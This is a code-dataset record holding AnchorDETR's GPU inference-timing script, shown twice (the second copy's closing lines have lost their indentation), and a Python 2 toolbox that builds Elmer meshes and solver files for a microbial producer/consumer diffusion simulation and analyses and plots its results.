compute_speeds.py | megvii-research/AnchorDETR | 160 | 6623867 | <reponame>megvii-research/AnchorDETR
# ------------------------------------------------------------------------
# Copyright (c) 2021 megvii-model. All Rights Reserved.
# ------------------------------------------------------------------------
# taken from https://gist.github.com/fmassa/c0fbb9fe7bf53b533b5cc241f5c8234c with a few modifications
# taken from detectron2 / fvcore with a few modifications
# https://github.com/facebookresearch/detectron2/blob/master/detectron2/utils/analysis.py
# Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved
import numpy as np
import tqdm
import torch
import time
from main import get_args_parser as get_main_args_parser
from models import build_model
from datasets import build_dataset
def warmup(model, inputs, N=10):
    """Run ``N`` forward passes so later timing excludes one-off start-up cost."""
    for _ in range(N):
        model(inputs)
    torch.cuda.synchronize()
def measure_time(model, inputs, N=10):
    """Return the mean wall-clock seconds per forward pass over ``N`` runs.

    A warmup is performed first, and the GPU is synchronized before the
    elapsed time is read so all queued kernels are accounted for.
    """
    warmup(model, inputs)
    start = time.time()
    for _ in range(N):
        model(inputs)
    torch.cuda.synchronize()
    return (time.time() - start) / N
def fmt_res(data):
    """Summarize an array of timings as a (mean, std, min, max) tuple."""
    return tuple(getattr(data, stat)() for stat in ('mean', 'std', 'min', 'max'))
def benchmark():
    """Time 100 single-image forward passes of the model on the val set.

    Returns {'time': (mean, std, min, max)} in seconds per forward pass.
    Requires a CUDA device; model/dataset come from the project's own
    builders, configured from command-line arguments.
    """
    main_args = get_main_args_parser().parse_args()
    dataset = build_dataset('val', main_args)
    model, _, _ = build_model(main_args)
    model.cuda()
    model.eval()
    # Pre-load the first 100 images so data loading is not timed.
    images = []
    for idx in range(100):
        img, t = dataset[idx]
        images.append(img)
    with torch.no_grad():
        tmp = []
        for img in tqdm.tqdm(images):
            inputs = [img.to('cuda')]
            t = measure_time(model, inputs)
            tmp.append(t)
        res = {'time': fmt_res(np.array(tmp))}
    return res
# Script entry point: run the benchmark and print the timing statistics.
if __name__ == '__main__':
    res = benchmark()
    print(res)
| # ------------------------------------------------------------------------
# Copyright (c) 2021 megvii-model. All Rights Reserved.
# ------------------------------------------------------------------------
# taken from https://gist.github.com/fmassa/c0fbb9fe7bf53b533b5cc241f5c8234c with a few modifications
# taken from detectron2 / fvcore with a few modifications
# https://github.com/facebookresearch/detectron2/blob/master/detectron2/utils/analysis.py
# Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved
import numpy as np
import tqdm
import torch
import time
from main import get_args_parser as get_main_args_parser
from models import build_model
from datasets import build_dataset
def warmup(model, inputs, N=10):
    """Run N untimed forward passes to initialise CUDA state, then sync."""
    for i in range(N):
        out = model(inputs)
    torch.cuda.synchronize()
def measure_time(model, inputs, N=10):
    """Return average wall-clock seconds per forward pass over N runs
    (after a warmup; GPU synchronised before the clock is read)."""
    warmup(model, inputs)
    s = time.time()
    for i in range(N):
        out = model(inputs)
    torch.cuda.synchronize()
    t = (time.time() - s) / N
    return t
def fmt_res(data):
    """Summarise a numpy array as a (mean, std, min, max) tuple."""
    return data.mean(), data.std(), data.min(), data.max()
def benchmark():
    """Time 100 single-image forward passes on the val set; returns
    {'time': (mean, std, min, max)} seconds. Requires CUDA."""
    main_args = get_main_args_parser().parse_args()
    dataset = build_dataset('val', main_args)
    model, _, _ = build_model(main_args)
    model.cuda()
    model.eval()
    # Pre-load images so data loading is not timed.
    images = []
    for idx in range(100):
        img, t = dataset[idx]
        images.append(img)
    with torch.no_grad():
        tmp = []
        for img in tqdm.tqdm(images):
            inputs = [img.to('cuda')]
            t = measure_time(model, inputs)
            tmp.append(t)
        res = {'time': fmt_res(np.array(tmp))}
    return res
if __name__ == '__main__':
res = benchmark()
print(res) | en | 0.622175 | # ------------------------------------------------------------------------ # Copyright (c) 2021 megvii-model. All Rights Reserved. # ------------------------------------------------------------------------ # taken from https://gist.github.com/fmassa/c0fbb9fe7bf53b533b5cc241f5c8234c with a few modifications # taken from detectron2 / fvcore with a few modifications # https://github.com/facebookresearch/detectron2/blob/master/detectron2/utils/analysis.py # Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved | 2.282368 | 2 |
toolbox_elmer.py | roughhawkbit/robs-python-scripts | 0 | 6623868 | #/usr/bin/python
from __future__ import division
from __future__ import with_statement
import math
import matplotlib
from matplotlib import pyplot
from mpl_toolkits.axes_grid1 import make_axes_locatable
import numpy
from numpy import mean as amean
import os
import re
from scipy.spatial import Delaunay
from scipy.spatial import KDTree
from scipy.stats.mstats import gmean as gmean
from scipy.stats.mstats import hmean as hmean
import toolbox_basic
import toolbox_plotting
import toolbox_results_new as toolbox_results
import toolbox_schematic
import xml.etree.ElementTree as xmlTree
class Simulation:
    """One iDynoMiCS-style producer/consumer simulation driven through Elmer.

    Wraps a results directory (self.root_dir): reads the protocol XML for the
    computational domain (side_length, wrapping, 2D/3D) and population counts,
    builds Elmer mesh/sif run directories at a given spatial 'detail_level',
    and post-processes Elmer's 'case.result' into concentration and reaction
    rate arrays, nearest-neighbour statistics and plots.

    NOTE: this module is Python 2 only (it uses 'exec' statements).
    Cell marks: 2 = consumer, 3 = producer (see consumers()/producers()).
    """
    def __init__(self, root_dir, find_protocol=True):
        """Attach to a results directory; optionally parse its protocol file
        for domain geometry, population sizes and the random seed."""
        self.root_dir = toolbox_basic.check_path(root_dir)
        if not find_protocol: return
        # Set up the space from the protocol file.
        protocol_path = toolbox_basic.find_protocol_file_path(self.root_dir)
        self.protocol_tree = toolbox_basic.get_xml_tree(protocol_path)
        space_params = self.protocol_tree.findall('./space/param')
        for param in space_params:
            name, text = param.attrib['name'], param.text
            if name == 'wrapping': self.wrapping = (text == 'true')
            elif name == 'length': self.side_length = int(float(text))
            elif name == 'nDims': self.is_3d = (int(float(text)) == 3)
        marks = self.protocol_tree.findall('./mark')
        for mark in marks:
            for param in mark:
                if param.attrib['name'] == 'value':
                    value = int(param.text)
                if param.attrib['name'] == 'number':
                    number = int(param.text)
            # Mark value 2 is the consumer species; anything else is treated
            # as the producer species.
            if value == 2:
                self.consumers = number
            else:
                self.producers = number
        rs = self.protocol_tree.find("./process/param[@name='randomSeed']")
        self.random_seed = int(rs.text)
    def copy_mesh_files(self, detail_level, sif_name):
        """Copy the detail-level mesh directory into a named run directory."""
        self.get_detail_level_mesh_dir(detail_level)
        run_dir = self.get_run_dir(detail_level, sif_name)
        run_mesh_dir = os.path.join(run_dir, 'mesh')
        toolbox_basic.copy_dir(self.detail_level_mesh_dir, run_mesh_dir)
    def get_concn_array(self, detail_level, sif_name):
        """Return the nodal concentration field as a square array of side
        grid_length+1, parsing Elmer's 'case.result' on first call and
        caching the array to disk."""
        self.get_run_dir(detail_level, sif_name)
        grid_length = detail_level * self.side_length
        array_path = os.path.join(self.run_dir, 'concn_array')
        if os.path.isfile(array_path):
            concn_array = toolbox_basic.load_array(array_path)
        else:
            result_file_path = os.path.join(self.run_dir, 'case.result')
            result_file_path = toolbox_basic.check_path(result_file_path)
            # This isn't quite correct! Without wrapping, Elmer skips some nodes
            num_nodes = (grid_length + 1)**2
            array_shape = (grid_length + 1,)*2
            # The last num_nodes lines of case.result hold the final solution.
            with open(result_file_path, 'Ur') as f:
                last_lines = f.readlines()[-num_nodes:]
            concn_array = numpy.array([float(line) for line in last_lines])
            concn_array = numpy.reshape(concn_array, array_shape)
            toolbox_basic.save_array(concn_array, array_path)
        return concn_array
    def get_consume_produce_functions(self, detail_level, sif_name):
        """Extract the consumption/production kinetics from the .sif file.

        Scrapes the MATC '$ function consume/produce' lines and builds Python
        equivalents. The 'exec' statements below rebind the local names
        consume_rate/produce_rate from source strings to actual functions
        (a Python 2 trick), so callables are returned.
        """
        self.get_sif_file_path(detail_level, sif_name)
        with open(self.sif_file_path) as f:
            lines = f.readlines()
        regex = re.compile('\$ function consume.*')
        cons_line = [line for line in lines if re.match(regex, line)][0]
        min_index = cons_line.index('min(0.0')
        close_index = cons_line.index(') }')
        consume_rate = 'def consume_rate(c):\n\treturn min(0.0, %s)' \
                                %(cons_line[min_index+8:close_index])
        regex = re.compile('\$ function produce.*')
        prod_line = [line for line in lines if re.match(regex, line)][0]
        min_index = prod_line.index('max(0.0')
        close_index = prod_line.index(') }')
        produce_rate = 'def produce_rate(c):\n\treturn max(0.0, %s)' \
                                %(prod_line[min_index+8:close_index])
        exec consume_rate
        exec produce_rate
        return consume_rate, produce_rate
    def get_detail_level_dir(self, detail_level):
        """Return (and create if needed) root_dir/detail_level_<n>."""
        name = 'detail_level_%d'%(detail_level)
        self.detail_level_dir = os.path.join(self.root_dir, name)
        toolbox_basic.make_dir(self.detail_level_dir)
        return self.detail_level_dir
    def get_detail_level_mesh_dir(self, detail_level):
        """Return (and create if needed) the detail level's 'mesh' subdir."""
        self.get_detail_level_dir(detail_level)
        self.detail_level_mesh_dir = os.path.join(self.detail_level_dir, 'mesh')
        toolbox_basic.make_dir(self.detail_level_mesh_dir)
        return self.detail_level_mesh_dir
    def get_detail_level_results(self, detail_level, read_only=False):
        """Open the detail level's 'cell_locations.xml' results file."""
        self.get_detail_level_dir(detail_level)
        cells_path = os.path.join(self.detail_level_dir, 'cell_locations.xml')
        cells_file = SimulationResultsFile(path=cells_path, read_only=read_only)
        return cells_file
    def get_combined_results(self, detail_level, sif_name):
        """Merge per-cell location attributes into the run's rate results,
        matching events by (x, y[, z]) position."""
        dl_results = self.get_detail_level_results(detail_level, read_only=True)
        run_results = self.get_run_results(detail_level, sif_name, read_only=True)
        for e in run_results.events:
            for o in dl_results.events:
                if o.position() == e.position():
                    for attrib in o.vars.keys():
                        e.vars[attrib] = o.vars[attrib]
        return run_results
    def get_rate_array(self, detail_level, sif_name):
        """Return the per-element reaction-rate array, computing it via
        get_run_results() if it is not yet cached on disk."""
        self.get_run_dir(detail_level, sif_name)
        array_path = os.path.join(self.run_dir, 'rate_array')
        if not os.path.isfile(array_path):
            self.get_run_results(detail_level, sif_name)
        return toolbox_basic.load_array(array_path)
    def get_run_results(self, detail_level, sif_name, read_only=False):
        """Open (or build) the run's 'cell_rates.xml': per-cell reaction rates
        and surface concentrations computed from the Elmer solution."""
        self.get_run_dir(detail_level, sif_name)
        rates_path = os.path.join(self.run_dir, 'cell_rates.xml')
        rates_file = SimulationResultsFile(path=rates_path, read_only=read_only)
        if rates_file.events == []:
            # No cached rates yet: derive them from the cell locations,
            # the solved concentration field and the .sif kinetics.
            grid_length = self.side_length * detail_level
            rates_file = self.get_detail_level_results(detail_level)
            rates_file.path = rates_path
            rates_file.setup_ranges(grid_length, self.wrapping)
            # NOTE(review): numpy.float/numpy.int were removed in NumPy 1.24 —
            # this relies on an old NumPy; confirm before upgrading.
            rate_array = numpy.zeros((grid_length,)*2, dtype=numpy.float)
            concn_array = self.get_concn_array(detail_level, sif_name)
            consume_rate, produce_rate = \
                        self.get_consume_produce_functions(detail_level, sif_name)
            rates_file.calc_rates_from_concn_array(concn_array, consume_rate,
                                    produce_rate, rate_array=rate_array)
            array_path = os.path.join(self.run_dir, 'rate_array')
            toolbox_basic.save_array(rate_array, array_path)
            head = 'mark,x,y'
            if self.is_3d: head += ',z'
            head += ',rate,amean_surf_concn'
            rates_file.set_event_list_header(head)
            rates_file.set_concn_rate_results(concn_array, rate_array)
            rates_file.write()
        return rates_file
    def get_run_dir(self, detail_level, sif_name):
        """Return (and create if needed) detail_level_<n>/<sif_name>."""
        self.get_detail_level_dir(detail_level)
        self.run_dir = os.path.join(self.detail_level_dir, sif_name)
        toolbox_basic.make_dir(self.run_dir)
        return self.run_dir
    def get_sif_file_path(self, detail_level, sif_name):
        """Return the path of the run's Elmer solver input (.sif) file."""
        self.get_run_dir(detail_level, sif_name)
        self.sif_file_path = os.path.join(self.run_dir, sif_name+'.sif')
        return self.sif_file_path
    def make_start_file(self, detail_level, sif_name):
        """Write ELMERSOLVER_STARTINFO pointing Elmer at the run's .sif."""
        self.get_run_dir(detail_level, sif_name)
        file_path = os.path.join(self.run_dir, 'ELMERSOLVER_STARTINFO')
        with open(file_path, 'w') as f:
            f.write('''%s\n1''' %(sif_name+'.sif'))
    def make_mesh_files(self, biomass_array, detail_level):
        """Write the Elmer mesh (mesh.header/nodes/elements/boundary) for a
        regular quad grid, with element body IDs taken from biomass_array."""
        self.get_detail_level_mesh_dir(detail_level)
        grid_length = self.side_length * detail_level
        num_elements = (grid_length)**2
        num_nodes = (grid_length+1)**2
        ### Make mesh.header
        header_path = os.path.join(self.detail_level_mesh_dir, 'mesh.header')
        # The 2 denotes dimensions, 202's are boundaries, 404's are elements.
        with open(header_path, 'w') as f:
            f.write('%d\t%d\t%d\t\n2\t\n202\t%d\t\n404\t%d\t\n\t'
                %(num_nodes, num_elements, num_elements, num_elements, num_elements))
        ### Make mesh.nodes
        text = ''
        for i in range(num_nodes):
            # Shouldn't this take account of detail_level?
            (y, x) = divmod(i, (grid_length+1))
            # Consider changing this line to
            #text += '%d -1 %.1f %.1f 0.0\n' %(i+1, x, y)
            text += str(i+1)+' -1 '+str(x)+' '+str(y)+' 0.0\n'
        nodes_path = os.path.join(self.detail_level_mesh_dir, 'mesh.nodes')
        with open(nodes_path, 'w') as f:
            f.write(text)
        ### Make mesh.elements
        text = ''
        counter = 0
        # Each element is a 404 quad over four consecutive grid nodes; 'body'
        # (from biomass_array) selects the Elmer body (species) it belongs to.
        for (i, j), body in numpy.ndenumerate(biomass_array):
            counter += 1
            n1 = (j+1) + (i*(grid_length+1))
            n2 = n1 + 1
            n3 = n2 + (grid_length+1)
            n4 = n3 - 1
            text += '%d %d 404 %d %d %d %d \n' %(counter, body, n1, n2, n3, n4)
        elements_path = os.path.join(self.detail_level_mesh_dir, 'mesh.elements')
        with open(elements_path, 'w') as f:
            f.write(text)
        ### Make mesh.boundary
        text = ''
        counter = 0
        # Along the bottom of the array (x=max) from left (y=0) to right (y=max).
        e_base = grid_length*(grid_length - 1) + 1
        n_base = grid_length*(grid_length + 1) + 1
        for i in range(grid_length):
            counter += 1
            element = e_base + i
            node = n_base + i
            text += '%d 1 %d 0 202 %d %d \n' %(counter, element, node, node+1)
        # Down the left of the array (y=0), from top (x=0) to bottom (x=max).
        n_base = grid_length + 1
        for i in range(grid_length):
            counter += 1
            element = (i*grid_length) + 1
            node = 1 + i*n_base
            text += '%d 2 %d 0 202 %d %d \n' %(counter, element, node, node+n_base)
        # Along the top of the array (x=0) from left (y=0) to right (y=max).
        for i in range(grid_length):
            counter += 1
            text += '%d 3 %d 0 202 %d %d \n' %(counter, i+1, i+1, i+2)
        # Down the left of the array (y=max), from top (x=0) to bottom (x=max).
        n_base = grid_length + 1
        for i in range(grid_length):
            counter += 1
            element = (i+1)*grid_length
            node = (i+1)*n_base
            text += '%d 4 %d 0 202 %d %d \n' %(counter, element, node+n_base, node)
        boundary_path = os.path.join(self.detail_level_mesh_dir, 'mesh.boundary')
        with open(boundary_path, 'w') as f:
            f.write(text)
    def set_up_population(self, detail_level):
        """Create (or reload) the detail level's cell population.

        On first call: copies cell locations from lastIter, stamps them into
        a biomass array, writes the Elmer mesh files and saves
        'cell_locations.xml'. On later calls: just rebuilds the index ranges.
        """
        grid_length = self.side_length * detail_level
        cells_file = self.get_detail_level_results(detail_level)
        # If cells_file.events is empty then the detail level directory has
        # probably only just been created, and this file does not yet exist.
        if cells_file.events == []:
            cells_file.set_space_parameters(wrapping=self.wrapping,
                                is_3d=self.is_3d, side_length=self.side_length)
            bio_array_path = os.path.join(self.detail_level_dir, 'bio_array')
            # NOTE(review): numpy.int was removed in NumPy 1.24 (old NumPy only).
            self.bio_array = numpy.ones((grid_length,)*2, dtype=numpy.int)
            last_path = os.path.join(self.root_dir, 'lastIter',
                                                'event_location_last.xml')
            last_file = SimulationResultsFile(path=last_path, read_only=True)
            cells_file.copy_event_list(last_file)
            cells_file.set_up_population(detail_level, grid_length,
                                            self.wrapping, self.bio_array)
            toolbox_basic.save_array(self.bio_array, bio_array_path)
            self.make_mesh_files(self.bio_array, detail_level)
            # Finally, update and save the 'cell_locations.xml' file.
            head = 'mark,x,i_min,i_max,y,j_min,j_max'
            if self.is_3d: head += ',z,k_min,k_max'
            cells_file.set_event_list_header(head)
            cells_file.write()
        else:
            cells_file.setup_ranges(grid_length, self.wrapping)
        return cells_file
    def calc_amean_surf_concn(self, concn_array):
        """Update each event's arithmetic-mean surface concentration.

        NOTE(review): self.event_list is never assigned in this class —
        possibly dead or broken code; confirm before relying on it.
        """
        for event in self.event_list:
            event.calc_amean_surf_concn(concn_array)
    def plot_concn_array(self, axis, detail_level, sif_name, set_as_white=None, plot_cs=True):
        """Image the concentration field on 'axis' with a custom diverging
        colormap; if set_as_white is given that value maps to white.
        Returns the colorbar (plot_cs=True) or the image artist."""
        array = self.get_concn_array(detail_level, sif_name)
        extent = [-0.5/detail_level, self.side_length + 0.5/detail_level]*2
        bottom_red, top_red = 0.1, 0.7
        bottom_green, top_green = 0.6, 0.0
        bottom_blue, top_blue = 0.1, 0.5
        mid_point = 0.5
        if not set_as_white == None:
            # Shift the colormap midpoint so set_as_white sits at white.
            max_val, min_val = numpy.max(array), numpy.min(array)
            up_diff, down_diff = max_val - set_as_white, set_as_white - min_val
            max_diff, total_diff = max(up_diff, down_diff), max_val - min_val
            up_rel_diff, down_rel_diff = up_diff/max_diff, down_diff/max_diff
            mid_point = down_diff/total_diff
        cdict = {'red': ((0, bottom_red, bottom_red),
                         (mid_point, 1, 1),
                         (1, top_red, top_red)),
                 'green': ((0, bottom_green, bottom_green),
                           (mid_point, 1, 1),
                           (1, top_green, top_green)),
                 'blue': ((0, bottom_blue, bottom_blue),
                          (mid_point, 1, 1),
                          (1, top_blue, top_blue))}
        my_cmap = \
            matplotlib.colors.LinearSegmentedColormap('my_cmap', cdict, 255)
        cs = axis.imshow(array, interpolation='nearest', origin='lower',
                         extent=extent, cmap=my_cmap)
        axis.set_xlim(0.0, self.side_length), axis.set_ylim(0.0, self.side_length)
        if plot_cs:
            cbar = toolbox_plotting.make_colorbar(axis, cs, fontsize=8)
            return cbar
        else:
            return cs
    def plot_rate_array(self, axis, detail_level, sif_name):
        """Image the reaction-rate field (blue = consumption, red =
        production, white = zero) with a symmetric color scale."""
        array = self.get_rate_array(detail_level, sif_name)
        extent = [0.0, self.side_length]*2
        max_val = numpy.max(abs(array))
        cdict = {'red': ((0, 0, 0), (0.5, 1, 1), (1, 1, 1)),
                 'green': ((0, 0, 0), (0.5, 1, 1), (1, 0, 0)),
                 'blue': ((0, 1, 1), (0.5, 1, 1), (1, 0, 0))}
        cmap = matplotlib.colors.LinearSegmentedColormap('cmap', cdict, 255)
        cs = axis.imshow(array, interpolation='nearest', extent=extent,
                         origin='lower', cmap=cmap)
        cs.set_clim(-max_val, max_val)
        axis.set_xlim(0.0, self.side_length)
        axis.set_ylim(0.0, self.side_length)
        toolbox_plotting.make_colorbar(axis, cs)
    def plot_population(self, axis, detail_level, sif_name):
        """Image only the sign of the rate field: consumer cells blue,
        producer cells red, empty space white."""
        array = numpy.sign(self.get_rate_array(detail_level, sif_name))
        extent = [0.0, self.side_length]*2
        cdict = {'red': ((0, 0, 0), (0.5, 1, 1), (1, 1, 1)),
                 'green': ((0, 0, 0), (0.5, 1, 1), (1, 0, 0)),
                 'blue': ((0, 1, 1), (0.5, 1, 1), (1, 0, 0))}
        cmap = matplotlib.colors.LinearSegmentedColormap('cmap', cdict, 3)
        cs = axis.imshow(array, interpolation='nearest', extent=extent,
                         origin='lower', cmap=cmap)
        cs.set_clim(-1.0, 1.0)
        axis.set_xlim(0.0, self.side_length)
        axis.set_ylim(0.0, self.side_length)
    def calc_nearest_neighbor_distances(self, detail_level):
        """Compute, for every cell, the distance to its nearest neighbour of
        the same species (sNN_dist), the other species (oNN_dist) and either
        (eNN_dist), caching the result in cell_locations.xml.

        NOTE(review): the guard below tests 'eNN_dist' three times — it was
        presumably meant to also test 'oNN_dist' and 'sNN_dist'; confirm.
        """
        rf = self.get_detail_level_results(detail_level)
        if rf.is_event_list_column_name('eNN_dist') and \
                    rf.is_event_list_column_name('eNN_dist') and \
                    rf.is_event_list_column_name('eNN_dist'):
            return rf
        cons_points = numpy.array([e.position() for e in rf.consumers()])
        prod_points = numpy.array([e.position() for e in rf.producers()])
        if self.wrapping:
            # Tile the points across periodic images so KDTree queries see
            # wrapped neighbours (wrap_points is defined elsewhere in the file).
            cons_points = wrap_points(cons_points, self.side_length, is_3d=self.is_3d)
            prod_points = wrap_points(prod_points, self.side_length, is_3d=self.is_3d)
        cons_tree = KDTree(cons_points)
        prod_tree = KDTree(prod_points)
        for e in rf.events:
            # k=2: for the same-species tree the nearest hit is the cell
            # itself (distance 0), so the true neighbour is element [1].
            c_dist = cons_tree.query(e.position(), k=2)[0]
            p_dist= prod_tree.query(e.position(), k=2)[0]
            if (e.vars['mark'] == 2):
                e.vars['sNN_dist'] = c_dist[1]
                e.vars['oNN_dist'] = p_dist[0]
            else:
                e.vars['sNN_dist'] = p_dist[1]
                e.vars['oNN_dist'] = c_dist[0]
            e.vars['eNN_dist'] = min(e.vars['sNN_dist'], e.vars['oNN_dist'])
        rf.add_event_list_column_name('eNN_dist')
        rf.add_event_list_column_name('oNN_dist')
        rf.add_event_list_column_name('sNN_dist')
        #rf.eventList.update_text()
        rf.write()
        return rf
    def get_mean_NN_dist(self, detail_level, mean='amean', dist='oNN_dist'):
        """Return the chosen mean ('amean'/'gmean'/'hmean') of the chosen
        nearest-neighbour distance column over all cells.
        (The exec rebinds 'mean' from a string to a function — Python 2.)"""
        rf = self.calc_nearest_neighbor_distances(detail_level)
        dists = [e.vars[dist] for e in rf.events]
        if not mean in ['amean', 'gmean', 'hmean']:
            toolbox_basic.error_message('toolbix_elmer.Simulation.get_mean_NN_dist()',
                                        'mean not recognised: %s'%(mean))
        exec 'def mean(x): return %s(x)'%(mean)
        return mean(dists)
    def scatter_oNN_dist_vs_rate(self, axis, detail_level, sif_name, markersize=5):
        """Scatter absolute metabolic rate against interspecies
        nearest-neighbour distance (consumers blue, producers red)."""
        rf = self.get_combined_results(detail_level, sif_name)
        cons_rates = [-e.vars['rate'] for e in rf.consumers()]
        cons_dists = [e.vars['oNN_dist'] for e in rf.consumers()]
        axis.plot(cons_dists, cons_rates, '.', color='blue', markersize=markersize)
        prod_rates = [e.vars['rate'] for e in rf.producers()]
        prod_dists = [e.vars['oNN_dist'] for e in rf.producers()]
        axis.plot(prod_dists, prod_rates, '.', color='red', markersize=markersize)
        axis.set_xlabel(r'Interspecies N-N distance ($\mu$m)')
        axis.set_ylabel('Abs. metabolic rate '+r'(zmol $cell^{-1} ms^{-1}$)')
        axis.set_xlim(1, axis.get_xlim()[1])
    def scatter_oNN_dist_vs_concn(self, axis, detail_level, sif_name, markersize=5):
        """Scatter surface concentration against interspecies
        nearest-neighbour distance (consumers blue, producers red)."""
        rf = self.get_combined_results(detail_level, sif_name)
        cons_concns = [e.vars['amean_surf_concn'] for e in rf.consumers()]
        cons_dists = [e.vars['oNN_dist'] for e in rf.consumers()]
        axis.plot(cons_dists, cons_concns, '.', color='blue', markersize=markersize)
        prod_concns = [e.vars['amean_surf_concn'] for e in rf.producers()]
        prod_dists = [e.vars['oNN_dist'] for e in rf.producers()]
        axis.plot(prod_dists, prod_concns, '.', color='red', markersize=markersize)
        axis.set_xlabel('Interspecies nearest neighbour distance')
        axis.set_ylabel('Surface concentration')
        axis.set_xlim(1, axis.get_xlim()[1])
    def plot_kinetics(self, axis, detail_level, sif_name, maxs):
        """Plot production (red) and |consumption| (blue) rates against
        concentration from 0 to maxs, using the .sif kinetics."""
        consume_rate, produce_rate = \
                    self.get_consume_produce_functions(detail_level, sif_name)
        p = list(numpy.linspace(0, maxs, num=1000))
        prod = [produce_rate(pval) for pval in p]
        cons = [-consume_rate(pval) for pval in p]
        axis.plot(p, prod, 'r-')
        axis.plot(p, cons, 'b-')
        #axis.set_xlabel(r'Product concentration ($\mu$M)')
        axis.set_xlabel(r'Hydrogen concentration ($\mu$M)')
        axis.set_ylabel('Metabolic rate '+r'(zmol $cell^{-1} ms^{-1}$)')
    def make_run_plot(self, detail_level, sif_name, maxP=None):
        """Assemble the four-panel summary figure (population, kinetics,
        concentration field, distance-vs-rate scatter) and save it as
        run_plot.pdf in the run directory."""
        fig = toolbox_plotting.ThesisFigure(double_column=True)
        axis = fig.add_subplot('A', 221)
        #self.plot_rate_array(axis, detail_level, sif_name)
        self.plot_population(axis, detail_level, sif_name)
        toolbox_plotting.empty_padding_axis(axis, "bottom")
        axis = fig.add_subplot('B', 222)
        toolbox_plotting.empty_padding_axis(axis, "bottom")
        if maxP == None:
            # Default axis limit: max concentration rounded up to a power of 10.
            maxP = numpy.max(self.get_concn_array(detail_level, sif_name))
            maxP = 10**math.ceil(math.log10(maxP))
        self.plot_kinetics(axis, detail_level, sif_name, maxP)
        axis.text(8, 0.2, r'$q_{A}([H])$', color='r', va='center', ha='center')
        axis.text(8, 0.8, r'$-q_{B}([H])$', color='b', va='center', ha='center')
        # Overlay the well-mixed analytic equilibrium point.
        # NOTE(review): these parameters are hard-coded — confirm they match
        # the .sif kinetics of the run being plotted.
        analytic = AnalyticApproach()
        analytic.set_parameters(A=1, qmaxA=1, pmax=10, kA=10, qmaxB=5, pmin=0.04, kB=30)
        p_equal = analytic.calc_equal_concn()
        r_equal = analytic.production(p_equal)
        axis.plot([p_equal]*2, [0,r_equal+0.05],
                  color='0.5', linestyle='-', zorder=-10)
        axis.text(p_equal, r_equal+0.05, '%.2f'%(p_equal),
                  color='0.5', va='bottom', ha='center', fontsize=8)
        axis.plot([0, p_equal+0.5], [r_equal]*2,
                  color='0.5', linestyle='-', zorder=-10)
        axis.text(p_equal+0.6, r_equal, '%.2f'%(r_equal),
                  color='0.5', va='center', ha='left', fontsize=8)
        axis = fig.add_subplot('C', 223)
        cs = self.plot_concn_array(axis, detail_level, sif_name, plot_cs=False)
        cbar = toolbox_plotting.make_colorbar(axis, cs, side="bottom")
        #label = r'Product concentration ($\mu$M)'
        label = r'Hydrogen concentration ($\mu$M)'
        cbar.set_ticks([2.0, 2.1, 2.2, 2.3, 2.4, 2.5, 2.6, 2.7])
        cbar.set_label(label)
        axis.set_xticklabels(['']*10)
        axis = fig.add_subplot('D', 224)
        toolbox_plotting.empty_padding_axis(axis, "bottom")
        self.calc_nearest_neighbor_distances(detail_level)
        self.scatter_oNN_dist_vs_rate(axis, detail_level, sif_name)
        fig.subplots_adjust(left=0.05, right=0.98, bottom=0.08, top=0.96,
                            wspace=0.3, hspace=0.25)
        fig.process_subplots(label_pos=(0.0, 1.1))
        axis = fig.find_axis_from_label('C')
        axis.tick_params(bottom="off")
        fig.save(os.path.join(self.get_run_dir(detail_level, sif_name), 'run_plot.pdf'))
    def check_runs(self, rel_tol=1E-3):
        """Print a warning for every run whose mass-balance relative
        difference exceeds rel_tol, or which has no cell_rates.xml."""
        for dl_dir in toolbox_basic.subdir_list(self.root_dir, 'detail_level_*'):
            run_dirs = toolbox_basic.subdir_list(dl_dir)
            for run_dir in run_dirs:
                if os.path.basename(run_dir) == 'mesh':
                    continue
                cell_file = os.path.join(run_dir, 'cell_rates.xml')
                if os.path.isfile(cell_file):
                    cell_file = SimulationResultsFile(path=cell_file, read_only=True)
                    rel_diff = cell_file.get_relative_difference()
                    if rel_diff > rel_tol:
                        print('%s has rel_diff = %f'%(run_dir, rel_diff))
                else:
                    print('%s has no cell_rates.xml file'%(run_dir))
    def get_amean_concn(self, detail_level, sif_name):
        """Return the run's arithmetic-mean bulk concentration."""
        rf = self.get_run_results(detail_level, sif_name, read_only=True)
        return rf.get_amean_concn()
    def get_mean_surf_concn(self, detail_level, sif_name,
                            cell_type='all', mean='amean'):
        """Return the chosen mean surface concentration over the chosen
        cell type ('all', 'consumers' or 'producers')."""
        rf = self.get_run_results(detail_level, sif_name, read_only=True)
        out = rf.get_mean_surf_concn(cell_type=cell_type, mean=mean)
        return out
    def get_sif_names(self, detail_level):
        """List the names of run subdirectories that contain a .sif file."""
        dl_dir = self.get_detail_level_dir(detail_level)
        out = []
        for subdir in toolbox_basic.subdir_list(dl_dir):
            base_name = os.path.basename(subdir)
            sif_path = os.path.join(subdir, base_name+'.sif')
            if os.path.exists(sif_path):
                out.append(base_name)
        return out
class SimulationResultsFile(toolbox_results.ResultXMLfile):
    """Results XML file with an <elmer> root.

    Holds a <simulation> element (space parameters and concentration/rate
    summary attributes) and an <eventList> of per-cell CSV rows, exposed as
    EventResult objects via self.events. Cell marks: 2 = consumer,
    3 = producer.
    """
    def __init__(self, path=None, read_only=False, header='mark,x,y'):
        """Open (or create) the file and wrap its event rows as EventResult
        objects. 'header' is currently unused — kept for interface
        compatibility."""
        toolbox_results.ResultXMLfile.__init__(self, path=path,
                                        root_name='elmer', read_only=read_only)
        self.simulation_root = self.find('./simulation')
        if self.simulation_root is None:
            self.simulation_root = xmlTree.SubElement(self.root, 'simulation')
        self.eventList = self.get_subresult('./eventList')
        if self.eventList is None:
            # Bug fix: this previously referenced the undefined name
            # 'toolbox_result' (the module is imported as 'toolbox_results'),
            # raising NameError whenever the file had no <eventList> element.
            self.eventList = toolbox_results.ResultXMLfile(root_name='eventList')
            self.append_subresult(self.eventList)
        self.events = self.eventList.read_in_text()
        for line in self.events:
            line.__class__ = EventResult
    def get_event_list_column_names(self):
        """Return the event-list CSV header as a list of column names."""
        return self.eventList.header.split(',')
    def set_space_parameters(self, wrapping=None, is_3d=None, side_length=None):
        """Record the domain geometry on the <simulation>/<space> element;
        None leaves the corresponding attribute untouched."""
        space = self.find('./simulation/space')
        if space is None:
            sim = self.find('./simulation')
            space = xmlTree.SubElement(sim, 'space')
        if wrapping is not None: space.set('wrapping', str(wrapping))
        if is_3d is not None: space.set('is_3d', str(is_3d))
        if side_length is not None: space.set('side_length', str(side_length))
